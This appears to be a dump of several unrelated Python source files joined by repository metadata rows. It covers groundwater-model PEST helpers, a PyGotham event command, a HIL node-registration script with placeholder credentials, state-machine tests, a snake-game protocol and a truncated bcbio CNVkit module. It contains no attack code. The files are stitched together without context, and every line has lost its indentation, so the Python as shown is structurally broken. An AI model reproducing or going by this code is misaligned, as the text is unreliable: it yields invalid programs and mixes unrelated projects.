kpers = list(sfr_kper.keys())
kpers.sort()
results = []
for kper in kpers:
df = sfr_kper[kper]
for sr in df_key.itertuples():
ob = df.loc["{0:03d}_{1:03d}".format(sr.segment, sr.reach), :]
results.append([kper, sr.Index, ob["flaqx"], ob["flout"]])
df = pd.DataFrame(data=results, columns=["kper", "obs_base", "flaqx", "flout"])
df.sort_values(by=["kper", "obs_base"], inplace=True)
df.to_csv(sfr_out_file + ".reach_processed", sep=" ", index=False)
return df
def modflow_sfr_gag_to_instruction_file(
gage_output_file, ins_file=None, parse_filename=False
):
"""writes an instruction file for an SFR gage output file to read Flow only at all times
Args:
gage_output_file (`str`): the gage output filename (ASCII).
ins_file (`str`, optional): the name of the instruction file to
create. If None, the name is `gage_output_file` +".ins".
Default is None
parse_filename (`bool`): if True, get the gage_num parameter by
parsing the gage output file filename if False, get the gage
number from the file itself
Returns:
tuple containing
- **pandas.DataFrame**: a dataframe with obsnme and obsval for the sfr simulated flows.
- **str**: file name of instructions file relating to gage output.
- **str**: file name of processed gage output for all times
Note:
Sets up observations for gage outputs only for the Flow column.
If `parse_namefile` is true, only text up to first '.' is used as the gage_num
"""
if ins_file is None:
ins_file = gage_output_file + ".ins"
# navigate the file to be sure the header makes sense
indat = [line.strip() for line in open(gage_output_file, "r").readlines()]
header = [i for i in indat if i.startswith('"')]
# yank out the gage number to identify the observation names
if parse_filename:
gage_num = os.path.basename(gage_output_file).split(".")[0]
else:
gage_num = re.sub(
"[^0-9]", "", indat[0].lower().split("gage no.")[-1].strip().split()[0]
)
# get the column names
cols = (
[i.lower() for i in header if "data" in i.lower()][0]
.lower()
.replace('"', "")
.replace("data:", "")
.split()
)
# make sure "Flow" is included in the columns
if "flow" not in cols:
raise Exception('Requested field "Flow" not in gage output columns')
# find which column is for "Flow"
flowidx = np.where(np.array(cols) == "flow")[0][0]
# write out the instruction file lines
inslines = [
"l1 " + (flowidx + 1) * "w " + "!g{0}_{1:d}!".format(gage_num, j)
for j in range(len(indat) - len(header))
]
inslines[0] = inslines[0].replace("l1", "l{0:d}".format(len(header) + 1))
# write the instruction file
with open(ins_file, "w") as ofp:
ofp.write("pif ~\n")
[ofp.write("{0}\n".format(line)) for line in inslines]
df = try_process_output_file(ins_file, gage_output_file)
return df, ins_file, gage_output_file
def setup_gage_obs(gage_file, ins_file=None, start_datetime=None, times=None):
"""setup a forward run post processor routine for the modflow gage file
Args:
gage_file (`str`): the gage output file (ASCII)
ins_file (`str`, optional): the name of the instruction file to create. If None, the name
is `gage_file`+".processed.ins". Default is `None`
start_datetime (`str`): a `pandas.to_datetime()` compatible `str`. If not `None`,
then the resulting observation names have the datetime suffix. If `None`,
the suffix is the output totim. Default is `None`.
times ([`float`]): a container of times to make observations for. If None,
all times are used. Default is None.
Returns:
tuple containing
- **pandas.DataFrame**: a dataframe with observation name and simulated values for the
values in the gage file.
- **str**: file name of instructions file that was created relating to gage output.
- **str**: file name of processed gage output (processed according to times passed above.)
Note:
Setups up observations for gage outputs (all columns).
This is the companion function of `gw_utils.apply_gage_obs()`
"""
with open(gage_file, "r") as f:
line1 = f.readline()
gage_num = int(
re.sub("[^0-9]", "", line1.split("GAGE No.")[-1].strip().split()[0])
)
gage_type = line1.split("GAGE No.")[-1].strip().split()[1].lower()
obj_num = int(line1.replace('"', "").strip().split()[-1])
line2 = f.readline()
df = pd.read_csv(
f, delim_whitespace=True, names=line2.replace('"', "").split()[1:]
)
df.columns = [
c.lower().replace("-", "_").replace(".", "_").strip("_") for c in df.columns
]
# get unique observation ids
obs_ids = {
col: "" for col in df.columns[1:]
} # empty dictionary for observation ids
for col in df.columns[1:]: # exclude column 1 (TIME)
colspl = col.split("_")
if len(colspl) > 1:
# obs name built out of "g"(for gage) "s" or "l"(for gage type) 2 chars from column name - date added later
obs_ids[col] = "g{0}{1}{2}".format(
gage_type[0], colspl[0][0], colspl[-1][0]
)
else:
obs_ids[col] = "g{0}{1}".format(gage_type[0], col[0:2])
with open(
"_gage_obs_ids.csv", "w"
) as f: # write file relating obs names to meaningfull keys!
[f.write("{0},{1}\n".format(key, obs)) for key, obs in obs_ids.items()]
# find passed times in df
if times is None:
times = df.time.unique()
missing = []
utimes = df.time.unique()
for t in times:
if not np.isclose(t, utimes).any():
missing.append(str(t))
if len(missing) > 0:
print(df.time)
raise Exception("the following times are missing:{0}".format(",".join(missing)))
# write output times to config file
with open("gage_obs.config", "w") as f:
f.write(gage_file + "\n")
[f.write("{0:15.10E}\n".format(t)) for t in times]
# extract data for times: returns dataframe and saves a processed df - read by pest
df, obs_file = apply_gage_obs(return_obs_file=True)
utimes = df.time.unique()
for t in times:
assert np.isclose(
t, utimes
).any(), "time {0} missing in processed dataframe".format(t)
idx = df.time.apply(
lambda x: np.isclose(x, times).any()
) # boolean selector of desired times in df
if start_datetime is not None:
# convert times to usable observation times
start_datetime = pd.to_datetime(start_datetime)
df.loc[:, "time_str"] = pd.to_timedelta(df.time, unit="d") + start_datetime
df.loc[:, "time_str"] = df.time_str.apply(
lambda x: datetime.strftime(x, "%Y%m%d")
)
else:
df.loc[:, "time_str"] = df.time.apply(lambda x: "{0:08.2f}".format(x))
# set up instructions (line feed for lines without obs (not in time)
df.loc[:, "ins_str"] = "l1\n"
df_times = df.loc[idx, :] # Slice by desired times
# TODO include GAGE No. in obs name (if permissible)
df.loc[df_times.index, "ins_str"] = df_times.apply(
lambda x: "l1 w {}\n".format(
" w ".join(
["!{0}{1}!".format(obs, x.time_str) for key, obs in obs_ids.items()]
)
),
axis=1,
)
df.index = np.arange(df.shape[0])
if ins_file is None:
ins_file = gage_file + ".processed.ins"
with open(ins_file, "w") as f:
f.write("pif ~\nl1\n")
[f.write(i) for i in df.ins_str]
df = try_process_output_file(ins_file, gage_file + ".processed")
return df, ins_file, obs_file
def apply_gage_obs(return_obs_file=False):
"""apply the modflow gage obs post-processor
Args:
return_obs_file (`bool`): flag to return the processed
observation file. Default is `False`.
Note:
This is the companion function of `gw_utils.setup_gage_obs()`
"""
times = []
with open("gage_obs.config") as f:
gage_file = f.readline().strip()
for line in f:
times.append(float(line.strip()))
obs_file = gage_file + ".processed"
with open(gage_file, "r") as f:
line1 = f.readline()
gage_num = int(
re.sub("[^0-9]", "", line1.split("GAGE No.")[-1].strip().split()[0])
)
gage_type = line1.split("GAGE No.")[-1].strip().split()[1].lower()
obj_num = int(line1.replace('"', "").strip().split()[-1])
line2 = f.readline()
df = pd.read_csv(
f, delim_whitespace=True, names=line2.replace('"', "").split()[1:]
)
df.columns = [c.lower().replace("-", "_").replace(".", "_") for c in df.columns]
df = df.loc[df.time.apply(lambda x: np.isclose(x, times).any()), :]
df.to_csv(obs_file, sep=" ", index=False)
if return_obs_file:
return df, obs_file
else:
return df
def apply_hfb_pars(par_file="hfb6_pars.csv"):
"""a function to apply HFB multiplier parameters.
Args:
par_file (`str`): the HFB parameter info file.
Default is `hfb_pars.csv`
Note:
This is the companion function to
`gw_utils.write_hfb_zone_multipliers_template()`
This is to account for the horrible HFB6 format that differs from other
BCs making this a special case
Requires "hfb_pars.csv"
Should be added to the forward_run.py script
"""
hfb_pars = pd.read_csv(par_file)
hfb_mults_contents = open(hfb_pars.mlt_file.values[0], "r").readlines()
skiprows = (
sum([1 if i.strip().startswith("#") else 0 for i in hfb_mults_contents]) + 1
)
header = hfb_mults_contents[:skiprows]
# read in the multipliers
names = ["lay", "irow1", "icol1", "irow2", "icol2", "hydchr"]
hfb_mults = pd.read_csv(
hfb_pars.mlt_file.values[0],
skiprows=skiprows,
delim_whitespace=True,
names=names,
).dropna()
# read in the original file
hfb_org = pd.read_csv(
hfb_pars.org_file.values[0],
skiprows=skiprows,
delim_whitespace=True,
names=names,
).dropna()
# multiply it out
hfb_org.hydchr *= hfb_mults.hydchr
for cn in names[:-1]:
hfb_mults[cn] = hfb_mults[cn].astype(np.int)
hfb_org[cn] = hfb_org[cn].astype(np.int)
# write the results
with open(hfb_pars.model_file.values[0], "w", newline="") as ofp:
[ofp.write("{0}\n".format(line.strip())) for line in header]
ofp.flush()
hfb_org[["lay", "irow1", "icol1", "irow2", "icol2", "hydchr"]].to_csv(
ofp, sep=" ", header=None, index=None
)
def write_hfb_zone_multipliers_template(m):
"""write a template file for an hfb using multipliers per zone (double yuck!)
Args:
m (`flopy.modflow.Modflow`): a model instance with an HFB package
Returns:
tuple containing
- **dict**: a dictionary with original unique HFB conductivity values and their
corresponding parameter names
- **str**: the template filename that was created
"""
if m.hfb6 is None:
raise Exception("no HFB package found")
# find the model file
hfb_file = os.path.join(m.model_ws, m.hfb6.file_name[0])
# this will use multipliers, so need to copy down the original
if not os.path.exists(os.path.join(m.model_ws, "hfb6_org")):
os.mkdir(os.path.join(m.model_ws, "hfb6_org"))
# copy down the original file
shutil.copy2(
os.path.join(m.model_ws, m.hfb6.file_name[0]),
os.path.join(m.model_ws, "hfb6_org", m.hfb6.file_name[0]),
)
if not os.path.exists(os.path.join(m.model_ws, "hfb6_mlt")):
os.mkdir(os.path.join(m.model_ws, "hfb6_mlt"))
# read in the model file
hfb_file_contents = open(hfb_file, "r").readlines()
# navigate the header
skiprows = (
sum([1 if i.strip().startswith("#") else 0 for i in hfb_file_contents]) + 1
)
header = hfb_file_contents[:skiprows]
# read in the data
names = ["lay", "irow1", "icol1", "irow2", "icol2", "hydchr"]
hfb_in = pd.read_csv(
hfb_file, skiprows=skiprows, delim_whitespace=True, names=names
).dropna()
for cn in names[:-1]:
hfb_in[cn] = hfb_in[cn].astype(np.int)
# set up a multiplier for each unique conductivity value
unique_cond = hfb_in.hydchr.unique()
hfb_mults = dict(
zip(unique_cond, ["hbz_{0:04d}".format(i) for i in range(len(unique_cond))])
)
# set up the TPL line for each parameter and assign
hfb_in["tpl"] = "blank"
for cn, cg in hfb_in.groupby("hydchr"):
hfb_in.loc[hfb_in.hydchr == cn, "tpl"] = "~{0:^10s}~".format(hfb_mults[cn])
assert "blank" not in hfb_in.tpl
# write out the TPL file
tpl_file = os.path.join(m.model_ws, "hfb6.mlt.tpl")
with open(tpl_file, "w", newline="") as ofp:
ofp.write("ptf ~\n")
[ofp.write("{0}\n".format(line.strip())) for line in header]
ofp.flush()
hfb_in[["lay", "irow1", "icol1", "irow2", "icol2", "tpl"]].to_csv(
ofp, sep=" ", quotechar=" ", header=None, index=None, mode="a"
)
# make a lookup for lining up the necessary files to
# perform multiplication with the helpers.apply_hfb_pars() function
# which must be added to the forward run script
with open(os.path.join(m.model_ws, "hfb6_pars.csv"), "w") as ofp:
ofp.write("org_file,mlt_file,model_file\n")
ofp.write(
"{0},{1},{2}\n".format(
os.path.join(m.model_ws, "hfb6_org", m.hfb6.file_name[0]),
os.path.join(
m.model_ws,
"hfb6_mlt",
os.path.basename(tpl_file).replace(".tpl", ""),
),
hfb_file,
)
)
return hfb_mults, tpl_file
def write_hfb_template(m):
"""write a template file for an hfb (yuck!)
Args:
m (`flopy.modflow.Modflow`): a model instance with an HFB package
Returns:
tuple containing
- **str**: name of the template file that was created
- **pandas.DataFrame**: a dataframe with use control file info for the
HFB parameters
"""
assert m.hfb6 is not None
hfb_file = os.path.join(m.model_ws, m.hfb6.file_name[0])
assert os.path.exists(hfb_file), "couldn't find hfb_file {0}".format(hfb_file)
f_in = open(hfb_file, "r")
tpl_file = hfb_file + ".tpl"
f_tpl = open(tpl_file, "w")
f_tpl.write("ptf ~\n")
parnme, parval1, xs, ys = [], [], [], []
iis, jjs, kks = [], [], []
xc = m.sr.xcentergrid
yc = m.sr.ycentergrid
while True:
line = f_in.readline()
if line == "":
break
f_tpl.write(line)
if not line.startswith("#"):
raw = line.strip().split()
nphfb = int(raw[0])
mxfb = int(raw[1])
nhfbnp = int(raw[2])
if nphfb > 0 or mxfb > 0:
raise Exception("not supporting terrible HFB pars")
for i in range(nhfbnp):
line = f_in.readline()
if line == "":
raise Exception("EOF")
raw = line.strip().split()
k = int(raw[0]) - 1
i = int(raw[1]) - 1
j = int(raw[2]) - 1
pn = "hb{0:02}{1:04d}{2:04}".format(k, i, j)
pv = float(raw[5])
raw[5] = "~ {0} ~".format(pn)
line = " ".join(raw) + "\n"
f_tpl.write(line)
parnme.append(pn)
parval1.append(pv)
xs.append(xc[i, j])
ys.append(yc[i, j])
iis.append(i)
jjs.append(j)
kks.append(k)
break
f_tpl.close()
f_in.close()
df = pd.DataFrame(
{
"parnme": parnme,
"parval1": parval1,
"x": xs,
"y": ys,
"i": iis,
"j": jjs,
"k": kks,
},
index=parnme,
)
df.loc[:, "pargp"] = "hfb_hydfac"
df.loc[:, "parubnd"] = df.parval1.max() * 10.0
df.loc[:, "parlbnd"] = df.parval1.min() * 0.1
return tpl_file, df
class GsfReader:
"""
a helper class to read a standard modflow-usg gsf file
Args:
gsffilename (`str`): filename
"""
def __init__(self, gsffilename):
with open(gsffilename, "r") as f:
self.read_data = f.readlines()
self.nnode, self.nlay, self.iz, self.ic = [
int(n) for n in self.read_data[1].split()
]
self.nvertex = int(self.read_data[2])
def get_vertex_coordinates(self):
"""
Returns:
Dictionary containing list of x, y and z coordinates for each vertex
"""
# vdata = self.read_data[3:self.nvertex+3]
vertex_coords = {}
for vert in range(self.nvertex):
x, y, z = self.read_data[3 + vert].split()
vertex_coords[vert + 1] = [float(x), float(y), float(z)]
return vertex_coords
def get_node_data(self):
"""
Returns:
nodedf: a pd.DataFrame containing Node information; Node, X, Y, Z, layer, numverts, vertidx
"""
node_data = []
for node in range(self.nnode):
nid, x, y, z, lay, numverts = self.read_data[
self.nvertex + 3 + node
].split()[:6]
# vertidx = {'ivertex': [int(n) for n in self.read_data[self.nvertex+3 + node].split()[6:]]}
vertidx = [
int(n) for n in self.read_data[self.nvertex + 3 + node].split()[6:]
]
node_data.append(
[
int(nid),
float(x),
float(y),
float(z),
int(lay),
int(numverts),
vertidx,
]
)
nodedf = pd.DataFrame(
node_data, columns=["node", "x", "y", "z", "layer", "numverts", "vertidx"]
)
return nodedf
def get_node_coordinates(self, zcoord=False, zero_based=False):
"""
Args:
zcoord (`bool`): flag to add z coord to coordinates. Default is False
zero_based (`bool`): flag to subtract one from the node numbers in the returned
node_coords dict. This is needed to support PstFrom. Default is False
Returns:
node_coords: Dictionary containing x and y coordinates for each node
"""
node_coords = {}
for node in range(self.nnode):
nid, x, y, z, lay, numverts = self.read_data[
self.nvertex + 3 + node
].split()[:6]
nid = int(nid)
if zero_based:
nid -= 1
node_coords[nid] = [float(x), float(y)]
if zcoord:
node_coords[nid] += [float(z)]
return node_coords
| bsd-3-clause | 1,953,825,560,543,366,700 | 36.248477 | 134 | 0.557838 | false |
PyGotham/pygotham | pygotham/manage/events.py | 1 | 1920 | """Event-related management commands."""
import sys
import arrow
from flask import current_app
from flask_script import Command, prompt, prompt_bool
from werkzeug.datastructures import MultiDict
from pygotham.core import db
from pygotham.forms import EventForm
from pygotham.models import Event
class CreateEvent(Command):
"""Management command to create an :class:`~pygotham.models.Event`.
In addition to asking for certain values, the event can also be
activated.
"""
def run(self):
"""Run the command."""
# Get the information.
name = prompt('Name')
slug = prompt('Slug (optional)')
begins = prompt('Event start date (YYYY-MM-DD)')
ends = prompt('Event end date (YYYY-MM-DD)')
proposals_begin = prompt('CFP start date (YYYY-MM-DD HH:MM:SS)')
active = prompt_bool('Activate the event')
data = MultiDict({
'name': name,
'slug': slug,
'begins': begins,
'ends': ends,
'proposals_begin': proposals_begin,
'active': active,
})
# Validate the form.
form = EventForm(data, csrf_enabled=False)
if form.validate():
# Save the new event.
event = Event()
form.populate_obj(event)
if event.active:
now = arrow.utcnow().to(current_app.config['TIME_ZONE']).naive
event.activity_begins = now
db.session.add(event)
db.session.commit()
print('\nEvent created successfully.')
print('Event(id={} slug={} name={})'.format(
event.id, event.slug, event.name))
return event
# If something went wrong, report it and exit out.
print('\nError creating event:')
for errors in form.errors.values():
print('\n'.join(errors))
sys.exit(1)
| bsd-3-clause | -2,552,559,807,039,151,000 | 28.538462 | 78 | 0.578125 | false |
SahilTikale/haas | examples/dbinit.py | 2 | 1653 | #!/usr/bin/python
"""
Register nodes with HIL.
This is intended to be used as a template for either creating a mock HIL setup
for development or to be modified to register real-life nodes that follow a
particular pattern.
In the example environment for which this module is written, there are 10
nodes which have IPMI interfaces that are sequentially numbered starting with
10.0.0.0, have a username of "ADMIN_USER" and password of "ADMIN_PASSWORD".
The ports are also numbered sequentially and are named following a dell switch
scheme, which have ports that look like "gi1/0/5"
It could be used in an environment similar to the one which
``hil.cfg`` corresponds, though could also be used for development with the
``hil.cfg.dev*``
"""
from subprocess import check_call
N_NODES = 6
ipmi_user = "ADMIN_USER"
ipmi_pass = "ADMIN_PASSWORD"
switch = "mock01"
obmd_base_uri = 'http://obmd.example.com/nodes/'
obmd_admin_token = 'secret'
def hil(*args):
"""Convenience function that calls the hil command line tool with
the given arguments.
"""
args = map(str, args)
print args
check_call(['hil'] + args)
hil('switch', 'register', switch, 'mock', 'ip', 'user', 'pass')
for node in range(N_NODES):
ipmi_ip = "10.0.0." + str(node + 1)
nic_port = "gi1/0/%d" % (node)
nic_name = 'nic1'
hil('node', 'register',
node,
obmd_base_uri + str(node),
obmd_admin_token,
"mock", ipmi_ip, ipmi_user, ipmi_pass)
hil('node', 'nic', 'register', node, nic_name, 'FillThisInLater')
hil('port', 'register', switch, nic_port)
hil('port', 'nic', 'add', switch, nic_port, node, nic_name)
| apache-2.0 | 1,030,338,861,592,609,900 | 29.611111 | 78 | 0.678766 | false |
jtushman/state_machine | tests.py | 1 | 11684 | import os
import nose
import functools
from pymongo import MongoClient
from nose.plugins.skip import SkipTest
from nose.tools import *
from nose.tools import assert_raises
try:
import mongoengine
except ImportError:
mongoengine = None
def establish_mongo_connection():
mongo_name = os.environ.get('AASM_MONGO_DB_NAME', 'test_acts_as_state_machine')
mongo_port = int(os.environ.get('AASM_MONGO_DB_PORT', 27017))
mongoengine.connect(mongo_name, port=mongo_port)
try:
import sqlalchemy
engine = sqlalchemy.create_engine('sqlite:///:memory:', echo=True)
except ImportError:
sqlalchemy = None
from state_machine import acts_as_state_machine, before, State, Event, after, InvalidStateTransition
def requires_mongoengine(func):
@functools.wraps(func)
def wrapper(*args, **kw):
if mongoengine is None:
raise SkipTest("mongoengine is not installed")
return func(*args, **kw)
return wrapper
def clear_mongo_databases():
mongo_name = os.environ.get('AASM_MONGO_DB_NAME', 'test_acts_as_state_machine')
mongo_port = int(os.environ.get('AASM_MONGO_DB_PORT', 27017))
client = MongoClient(port=mongo_port)
client.drop_database(mongo_name)
def requires_sqlalchemy(func):
@functools.wraps(func)
def wrapper(*args, **kw):
if sqlalchemy is None:
raise SkipTest("sqlalchemy is not installed")
return func(*args, **kw)
return wrapper
###################################################################################
## Plain Old In Memory Tests
###################################################################################
def test_state_machine():
@acts_as_state_machine
class Robot():
name = 'R2-D2'
sleeping = State(initial=True)
running = State()
cleaning = State()
run = Event(from_states=sleeping, to_state=running)
cleanup = Event(from_states=running, to_state=cleaning)
sleep = Event(from_states=(running, cleaning), to_state=sleeping)
@before('sleep')
def do_one_thing(self):
print("{} is sleepy".format(self.name))
@before('sleep')
def do_another_thing(self):
print("{} is REALLY sleepy".format(self.name))
@after('sleep')
def snore(self):
print("Zzzzzzzzzzzz")
@after('sleep')
def snore(self):
print("Zzzzzzzzzzzzzzzzzzzzzz")
robot = Robot()
eq_(robot.current_state, 'sleeping')
assert robot.is_sleeping
assert not robot.is_running
robot.run()
assert robot.is_running
robot.sleep()
assert robot.is_sleeping
def test_state_machine_no_callbacks():
@acts_as_state_machine
class Robot():
name = 'R2-D2'
sleeping = State(initial=True)
running = State()
cleaning = State()
run = Event(from_states=sleeping, to_state=running)
cleanup = Event(from_states=running, to_state=cleaning)
sleep = Event(from_states=(running, cleaning), to_state=sleeping)
robot = Robot()
eq_(robot.current_state, 'sleeping')
assert robot.is_sleeping
assert not robot.is_running
robot.run()
assert robot.is_running
robot.sleep()
assert robot.is_sleeping
def test_multiple_machines():
@acts_as_state_machine
class Person(object):
sleeping = State(initial=True)
running = State()
cleaning = State()
run = Event(from_states=sleeping, to_state=running)
cleanup = Event(from_states=running, to_state=cleaning)
sleep = Event(from_states=(running, cleaning), to_state=sleeping)
@before('run')
def on_run(self):
things_done.append("Person.ran")
@acts_as_state_machine
class Dog(object):
sleeping = State(initial=True)
running = State()
run = Event(from_states=sleeping, to_state=running)
sleep = Event(from_states=(running,), to_state=sleeping)
@before('run')
def on_run(self):
things_done.append("Dog.ran")
things_done = []
person = Person()
dog = Dog()
eq_(person.current_state, 'sleeping')
eq_(dog.current_state, 'sleeping')
assert person.is_sleeping
assert dog.is_sleeping
person.run()
eq_(things_done, ["Person.ran"])
###################################################################################
## SqlAlchemy Tests
###################################################################################
@requires_sqlalchemy
def test_sqlalchemy_state_machine():
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
Base = declarative_base()
@acts_as_state_machine
class Puppy(Base):
__tablename__ = 'puppies'
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
name = sqlalchemy.Column(sqlalchemy.String)
sleeping = State(initial=True)
running = State()
cleaning = State()
run = Event(from_states=sleeping, to_state=running)
cleanup = Event(from_states=running, to_state=cleaning)
sleep = Event(from_states=(running, cleaning), to_state=sleeping)
@before('sleep')
def do_one_thing(self):
print("{} is sleepy".format(self.name))
@before('sleep')
def do_another_thing(self):
print("{} is REALLY sleepy".format(self.name))
@after('sleep')
def snore(self):
print("Zzzzzzzzzzzz")
@after('sleep')
def snore(self):
print("Zzzzzzzzzzzzzzzzzzzzzz")
Base.metadata.create_all(engine)
Session = sessionmaker(bind=engine)
session = Session()
puppy = Puppy(name='Ralph')
eq_(puppy.current_state, Puppy.sleeping)
assert puppy.is_sleeping
assert not puppy.is_running
puppy.run()
assert puppy.is_running
session.add(puppy)
session.commit()
puppy2 = session.query(Puppy).filter_by(id=puppy.id)[0]
assert puppy2.is_running
@requires_sqlalchemy
def test_sqlalchemy_state_machine_no_callbacks():
''' This is to make sure that the state change will still work even if no callbacks are registered.
'''
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
Base = declarative_base()
@acts_as_state_machine
class Kitten(Base):
__tablename__ = 'kittens'
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
name = sqlalchemy.Column(sqlalchemy.String)
sleeping = State(initial=True)
running = State()
cleaning = State()
run = Event(from_states=sleeping, to_state=running)
cleanup = Event(from_states=running, to_state=cleaning)
sleep = Event(from_states=(running, cleaning), to_state=sleeping)
Base.metadata.create_all(engine)
Session = sessionmaker(bind=engine)
session = Session()
kitten = Kitten(name='Kit-Kat')
eq_(kitten.current_state, Kitten.sleeping)
assert kitten.is_sleeping
assert not kitten.is_running
kitten.run()
assert kitten.is_running
session.add(kitten)
session.commit()
kitten2 = session.query(Kitten).filter_by(id=kitten.id)[0]
assert kitten2.is_running
@requires_sqlalchemy
def test_sqlalchemy_state_machine_using_initial_state():
''' This is to make sure that the database will save the object with the initial state.
'''
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
Base = declarative_base()
@acts_as_state_machine
class Penguin(Base):
__tablename__ = 'penguins'
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
name = sqlalchemy.Column(sqlalchemy.String)
sleeping = State(initial=True)
running = State()
cleaning = State()
run = Event(from_states=sleeping, to_state=running)
cleanup = Event(from_states=running, to_state=cleaning)
sleep = Event(from_states=(running, cleaning), to_state=sleeping)
Base.metadata.create_all(engine)
Session = sessionmaker(bind=engine)
session = Session()
# Note: No state transition occurs between the initial state and when it's saved to the database.
penguin = Penguin(name='Tux')
eq_(penguin.current_state, Penguin.sleeping)
assert penguin.is_sleeping
session.add(penguin)
session.commit()
penguin2 = session.query(Penguin).filter_by(id=penguin.id)[0]
assert penguin2.is_sleeping
###################################################################################
## Mongo Engine Tests
###################################################################################
@requires_mongoengine
@with_setup(clear_mongo_databases, clear_mongo_databases)
def test_mongoengine_state_machine():
@acts_as_state_machine
class Person(mongoengine.Document):
name = mongoengine.StringField(default='Billy')
sleeping = State(initial=True)
running = State()
cleaning = State()
run = Event(from_states=sleeping, to_state=running)
cleanup = Event(from_states=running, to_state=cleaning)
sleep = Event(from_states=(running, cleaning), to_state=sleeping)
@before('sleep')
def do_one_thing(self):
print("{} is sleepy".format(self.name))
@before('sleep')
def do_another_thing(self):
print("{} is REALLY sleepy".format(self.name))
@after('sleep')
def snore(self):
print("Zzzzzzzzzzzz")
@after('sleep')
def snore(self):
print("Zzzzzzzzzzzzzzzzzzzzzz")
establish_mongo_connection()
person = Person()
person.save()
eq_(person.current_state, Person.sleeping)
assert person.is_sleeping
assert not person.is_running
person.run()
assert person.is_running
person.sleep()
assert person.is_sleeping
person.run()
person.save()
assert person.is_running
@requires_mongoengine
@with_setup(clear_mongo_databases, clear_mongo_databases)
def test_invalid_state_transition():
@acts_as_state_machine
class Person(mongoengine.Document):
name = mongoengine.StringField(default='Billy')
sleeping = State(initial=True)
running = State()
cleaning = State()
run = Event(from_states=sleeping, to_state=running)
cleanup = Event(from_states=running, to_state=cleaning)
sleep = Event(from_states=(running, cleaning), to_state=sleeping)
establish_mongo_connection()
person = Person()
person.save()
assert person.is_sleeping
#should raise an invalid state exception
with assert_raises(InvalidStateTransition):
person.sleep()
@requires_mongoengine
@with_setup(clear_mongo_databases, clear_mongo_databases)
def test_before_callback_blocking_transition():
@acts_as_state_machine
class Runner(mongoengine.Document):
name = mongoengine.StringField(default='Billy')
sleeping = State(initial=True)
running = State()
cleaning = State()
run = Event(from_states=sleeping, to_state=running)
cleanup = Event(from_states=running, to_state=cleaning)
sleep = Event(from_states=(running, cleaning), to_state=sleeping)
@before('run')
def check_sneakers(self):
return False
establish_mongo_connection()
runner = Runner()
runner.save()
assert runner.is_sleeping
runner.run()
assert runner.is_sleeping
assert not runner.is_running
if __name__ == "__main__":
nose.run()
| mit | -6,081,339,455,101,649,000 | 27.086538 | 103 | 0.619308 | false |
tobast/sysres-pikern | snake/snake_common.py | 1 | 1643 |
SERVER_PORT = 31412
PSIZE = 20
WIDTH = 30
HEIGHT = 30
PERIOD = 100
def p2add(u, v):
return (u[0] + v[0], u[1] + v[1])
DIRS = [(0, 1), (1, 0), (-1, 0), (0, -1)]
NB_APPLES = 3
class Packet:
def __init__(self, data = b''):
self.start_index = 0
self.data = data
def add_position(self, p):
self.data += bytes((p[0], p[1]))
def add_uint16(self, n):
self.data += bytes(((n >> 8) & 0xff, n & 0xff))
def add_uint8(self, n):
self.data += bytes((n,))
def add_color(self, c):
self.add_uint16(c[0])
self.add_uint16(c[1])
self.add_uint16(c[2])
def add_position_list(self, l):
self.add_uint16(len(l))
for p in l:
self.add_position(p)
def read_position(self):
r = self.data[self.start_index]
s = self.data[self.start_index + 1]
self.start_index += 2
return (r, s)
def read_uint16(self):
r = self.data[self.start_index]
s = self.data[self.start_index + 1]
self.start_index += 2
return (r << 8) | s
def read_uint8(self):
r = self.data[self.start_index]
self.start_index += 1
return r
def read_position_list(self):
l = []
n = self.read_uint16()
for i in range(n):
l.append(self.read_position())
return l
def read_color(self):
r = self.read_uint16()
g = self.read_uint16()
b = self.read_uint16()
return (r, g, b)
TOSERVER_INIT = 0
TOCLIENT_INIT = 1
SET_SNAKE = 2
SET_APPLES = 3
SET_DIRECTION = 4
SET_SNAKE_COLOR = 5
TOCLIENT_ACCESS_DENIED = 6
| gpl-3.0 | 71,077,579,929,375,590 | 20.906667 | 55 | 0.522215 | false |
verdurin/bcbio-nextgen | bcbio/structural/cnvkit.py | 1 | 21743 | """Copy number detection with CNVkit with specific support for targeted sequencing.
http://cnvkit.readthedocs.org
"""
import copy
import os
import shutil
import sys
import tempfile
import pybedtools
import numpy as np
import toolz as tz
from bcbio import install, utils
from bcbio.bam import ref
from bcbio.distributed.transaction import file_transaction, tx_tmpdir
from bcbio.heterogeneity import chromhacks
from bcbio.pipeline import datadict as dd
from bcbio.pipeline import config_utils
from bcbio.variation import bedutils, vcfutils
from bcbio.provenance import do
from bcbio.structural import annotate, shared, regions, plot
def run(items, background=None):
"""Detect copy number variations from batched set of samples using CNVkit.
"""
if not background: background = []
return _cnvkit_by_type(items, background)
def _sv_workdir(data):
return utils.safe_makedir(os.path.join(data["dirs"]["work"], "structural",
dd.get_sample_name(data), "cnvkit"))
def _cnvkit_by_type(items, background):
"""Dispatch to specific CNVkit functionality based on input type.
"""
if len(items + background) == 1:
return _run_cnvkit_single(items[0])
elif vcfutils.get_paired_phenotype(items[0]):
return _run_cnvkit_cancer(items, background)
else:
return _run_cnvkit_population(items, background)
def _associate_cnvkit_out(ckout, items):
"""Associate cnvkit output with individual items.
"""
ckout["variantcaller"] = "cnvkit"
ckout = _add_seg_to_output(ckout, items[0])
ckout = _add_gainloss_to_output(ckout, items[0])
ckout = _add_segmetrics_to_output(ckout, items[0])
out = []
for data in items:
ckout = copy.deepcopy(ckout)
ckout = _add_bed_to_output(ckout, data)
# ckout = _add_coverage_bedgraph_to_output(ckout, data)
ckout = _add_cnr_bedgraph_and_bed_to_output(ckout, data)
if "svplots" in dd.get_tools_on(data):
ckout = _add_plots_to_output(ckout, data)
if "sv" not in data:
data["sv"] = []
data["sv"].append(ckout)
out.append(data)
return out
def _run_cnvkit_single(data, background=None):
"""Process a single input file with BAM or uniform background.
"""
work_dir = _sv_workdir(data)
test_bams = [data["align_bam"]]
if background:
background_bams = [x["align_bam"] for x in background]
background_name = os.path.splitext(os.path.basename(background_bams[0]))[0]
else:
background_bams = []
background_name = None
ckout = _run_cnvkit_shared(data, test_bams, background_bams, work_dir,
background_name=background_name)
if not ckout:
return [data]
else:
return _associate_cnvkit_out(ckout, [data])
def _run_cnvkit_cancer(items, background):
